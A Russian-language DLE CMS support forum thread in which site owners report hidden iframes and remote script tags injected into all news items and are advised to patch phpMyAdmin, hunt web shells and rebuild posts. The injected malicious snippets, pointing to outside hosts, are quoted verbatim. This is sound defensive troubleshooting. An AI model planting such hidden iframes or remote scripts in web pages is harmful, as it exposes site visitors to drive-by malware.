hrompic 4 Опубликовано: 21 ноября 2010 Рассказать Опубликовано: 21 ноября 2010 Друзья! Сегодня утром заметил что на сайт в main.tpl стоит код <iframe src="http://4sos.ru" width="0" height="0" frameborder="0"></iframe> .Это мелочи ,код убрал но когда приступил к редактированию новостей на сайте то с ужасом увидел что во всех новостях(в окнах полной новости ) стоит этот код !!! Так как в БД около 90000 новостей и во всех новостях был этот код (причем через замену код не убирался) пришлось восстановить более ранний дамп БД. Такой вопрос: 1.как такое могло произойти? 2.как этого избежать в дальнейшем? Версия 8.5 ,сайт ru-video.net Заранее благодарен! Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 082 Опубликовано: 21 ноября 2010 Рассказать Опубликовано: 21 ноября 2010 hrompic, Получен прямой доступ к базе данных, потому как имея даже полный доступ к админпанели DLE, этот код в новость не добавить, он его вырезает при добавлении. Если на вашем сервере стояли все вышедшие ранее патчи безопасности для скрипта, и нет сторонних скриптов, то ваш сервер скорее всего подвергся атаке со стороны phpMyAdmin, недавно была обнаружена серьезная уязвимость в нем, позволяющая залить шелл на сервер и получить доступ к БД. Обновите phpMyAdmin до актуальной версии, лучше сначала предварительно удалить его с севрера, смените все пароли, проверьте сайт на наличие шелла, это может сделать встроенный антивирус в админпанели DLE Цитата Ссылка на сообщение Поделиться на других сайтах
hrompic 4 Опубликовано: 21 ноября 2010 Рассказать Опубликовано: 21 ноября 2010 Автор hrompic, Получен прямой доступ к базе данных, потому как имея даже полный доступ к админпанели DLE, этот код в новость не добавить, он его вырезает при добавлении. Если на вашем сервере стояли все вышедшие ранее патчи безопасности для скрипта, и нет сторонних скриптов, то ваш сервер скорее всего подвергся атаке со стороны phpMyAdmin, недавно была обнаружена серьезная уязвимость в нем, позволяющая залить шелл на сервер и получить доступ к БД. Обновите phpMyAdmin до актуальной версии, лучше сначала предварительно удалить его с севрера, смените все пароли, проверьте сайт на наличие шелла, это может сделать встроенный антивирус в админпанели DLE А какая последняя версия phpMyAdmin и как её обновить? Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 082 Опубликовано: 21 ноября 2010 Рассказать Опубликовано: 21 ноября 2010 hrompic, phpMyAdmin 3.3.8 http://www.phpmyadmin.net/home_page/index.php инструкция по обновлению там же. Цитата Ссылка на сообщение Поделиться на других сайтах
hrompic 4 Опубликовано: 21 ноября 2010 Рассказать Опубликовано: 21 ноября 2010 Автор hrompic, phpMyAdmin 3.3.8 http://www.phpmyadmin.net/home_page/index.php инструкция по обновлению там же. У меня стоит phpMyAdmin - 2.11.8.1deb5+lenny4 - эта версия уязвимая? Цитата Ссылка на сообщение Поделиться на других сайтах
Sarvan 35 Опубликовано: 21 ноября 2010 Рассказать Опубликовано: 21 ноября 2010 До 2.11.10 он дыряв и есть эксплойт. Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 082 Опубликовано: 21 ноября 2010 Рассказать Опубликовано: 21 ноября 2010 У меня стоит phpMyAdmin - 2.11.8.1deb5+lenny4 - эта версия уязвимая? да и еще как, сохраните конфигурационный файл, и удалите другие файлы из этой папке, потом залейте новую версию и восстановите конфигурационный файлДо 2.11.10 он дыряв и есть эксплойт. для 3 линейки там уже тоже порядочно нашли. Кстати измените пути для доступа к phpMyAdmin на какой нибудь случайный и никому неизвестный, чтобы никто кроме вас не мог знать путь, по которому он распологается.и с вероятностью в 99,9% у вас теперь где то шелл на сервере, его нужно найти и удалить, хотя злоумышленник его мог сам удалить, чтобы затереть следы Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 21 ноября 2010 Рассказать Опубликовано: 21 ноября 2010 Лично я не понимаю зачем постоянно хранить этот phpMyAdmin на сервере. Проще установить когда он нужен для каких-то операций, а потом снова удалить. Или еще проще дать права доступа на каталог только для своего IP причем через замену код не убирался В базе все вот такое: <iframe src="http://4sos.ru" width="0" height="0" frameborder="0"></iframe> или в каждой новости разное? Цитата Ссылка на сообщение Поделиться на других сайтах
Sarvan 35 Опубликовано: 21 ноября 2010 Рассказать Опубликовано: 21 ноября 2010 (изменено) и с вероятностью в 99,9% у вас теперь где то шелл на сервере, его нужно найти и удалить, хотя злоумышленник его мог сам удалить, чтобы затереть следы Да начните с /tmp 99%, что шел *.php, a.txt там. Изменено 21 ноября 2010 пользователем Sarvan Цитата Ссылка на сообщение Поделиться на других сайтах
hrompic 4 Опубликовано: 21 ноября 2010 Рассказать Опубликовано: 21 ноября 2010 Автор Лично я не понимаю зачем постоянно хранить этот phpMyAdmin на сервере. Проще установить когда он нужен для каких-то операций, а потом снова удалить. Или еще проще дать права доступа на каталог только для своего IP причем через замену код не убирался В базе все вот такое: <iframe src="http://4sos.ru" width="0" height="0" frameborder="0"></iframe> или в каждой новости разное? Во всех новостях в окнах полной новости этот код. Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 21 ноября 2010 Рассказать Опубликовано: 21 ноября 2010 Ну так сделайте замену <iframe src="http://****" width="0" height="0" frameborder="0"></iframe> на пустоту. Пишите мне в ICQ я расскажу как можно почистить базу Цитата Ссылка на сообщение Поделиться на других сайтах
hrompic 4 Опубликовано: 21 ноября 2010 Рассказать Опубликовано: 21 ноября 2010 (изменено) Автор Ну так сделайте замену <iframe src="http://****" width="0" height="0" frameborder="0"></iframe> на пустоту. Пишите мне в ICQ я расскажу как можно почистить базу На пустоту делал-не выходит....К сожалению БД уже перезалил и потерял 400 новостей... При заливке дампа в БД через прогу Sypex Dumper Lite 1.0.8 после прошествии 5 минут выдается: Internal Server Error The server encountered an internal error or misconfiguration and was unable to complete your request. Please contact the server administrator, hrompic@yandex.ru and inform them of the time the error occurred, and anything you might have done that may have caused the error. и соответсвенно дамп не доливается! Какого лимита не хватает подскажите??? Изменено 21 ноября 2010 пользователем hrompic Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 082 Опубликовано: 21 ноября 2010 Рассказать Опубликовано: 21 ноября 2010 Какого лимита не хватает подскажите??? в логах скрипта пишется конкретная причина, нужно по логам смотреть. Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 21 ноября 2010 Рассказать Опубликовано: 21 ноября 2010 При заливке дампа в БД через прогу Sypex Dumper Lite 1.0.8 после прошествии 5 минут выдается Зачем заливать через какую-то программу? Прочитайте по этой ссылке: http://forum.dle-news.ru/index.php?showtopic=49371&view=findpost&p=234553 Цитата Ссылка на сообщение Поделиться на других сайтах
hrompic 4 Опубликовано: 21 ноября 2010 Рассказать Опубликовано: 21 ноября 2010 Автор При заливке дампа в БД через прогу Sypex Dumper Lite 1.0.8 после прошествии 5 минут выдается Зачем заливать через какую-то программу? Прочитайте по этой ссылке: http://forum.dle-news.ru/index.php?showtopic=49371&view=findpost&p=234553 К сожалению мне это не осилить....Блин,девять часов не могу БД залить дампером.... Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 21 ноября 2010 Рассказать Опубликовано: 21 ноября 2010 Написали бы мне в ICQ и я давно бы помог Цитата Ссылка на сообщение Поделиться на других сайтах
hrompic 4 Опубликовано: 21 ноября 2010 Рассказать Опубликовано: 21 ноября 2010 Автор Написали бы мне в ICQ и я давно бы помог Вы знаете как дамп 700 МБ закачать в БД ? Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 21 ноября 2010 Рассказать Опубликовано: 21 ноября 2010 Конечно, я же даже ссылку Вам дал и там описано подробно, как это делается Цитата Ссылка на сообщение Поделиться на других сайтах
hrompic 4 Опубликовано: 23 ноября 2010 Рассказать Опубликовано: 23 ноября 2010 Автор Друзья! Огромное спасибо за советы! Шеллы удалил,БД восстановил из дампа,муадмин обновил и изменил путь - хрен теперь найдут. Всем спасибо за участие! Цитата Ссылка на сообщение Поделиться на других сайтах
scodch 0 Опубликовано: 6 января 2011 Рассказать Опубликовано: 6 января 2011 Здравствуйте. У меня возникла та же проблема. Во всех новостях, в конце краткой и полной новости код: <script src="http://zheenix.msk.ru/abc.js" type="text/javascript"></script> Поиск и замена результатов не даёт. Подскажите пожалуйста, как можно почистить базу от этого кода. Сайт: hdrip.su Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 082 Опубликовано: 6 января 2011 Рассказать Опубликовано: 6 января 2011 scodch, обновитесь до актуальной версии, там есть раздел перестроения новостей, он зачистит зловредный код. Цитата Ссылка на сообщение Поделиться на других сайтах
scodch 0 Опубликовано: 6 января 2011 Рассказать Опубликовано: 6 января 2011 (изменено) scodch, обновитесь до актуальной версии, там есть раздел перестроения новостей, он зачистит зловредный код. Помогло! Большое спасибо! Код удален А можно где-то побольше узнать о разделе перестроения новостей? Хотелось бы побольше узнать что и как этот чудо раздел делает Изменено 6 января 2011 пользователем scodch Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 082 Опубликовано: 6 января 2011 Рассказать Опубликовано: 6 января 2011 scodch, этот раздел перестраивает новости в соответствии с настройками скрипта и требованиями безопасности скрипта. JS код добавить в новость через скрипт нельзя, это запрещено, поэтому при перестроении новостей, скрипт автоматически его зачищает. Цитата Ссылка на сообщение Поделиться на других сайтах
scodch 0 Опубликовано: 6 января 2011 Рассказать Опубликовано: 6 января 2011 scodch, этот раздел перестраивает новости в соответствии с настройками скрипта и требованиями безопасности скрипта. JS код добавить в новость через скрипт нельзя, это запрещено, поэтому при перестроении новостей, скрипт автоматически его зачищает. Понял. Очень полезная функция. Еще раз спасибо! Цитата Ссылка на сообщение Поделиться на других сайтах
abasive 41 Опубликовано: 6 января 2011 Рассказать Опубликовано: 6 января 2011 когда приступил к редактированию новостей на сайте то с ужасом увидел что во всех новостях(в окнах полной новости ) стоит этот код !!! А вы не подумали может код ставили в fullstory, а не в базу Провертье ваш шаблон а не ковырайтесь в базе данных Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.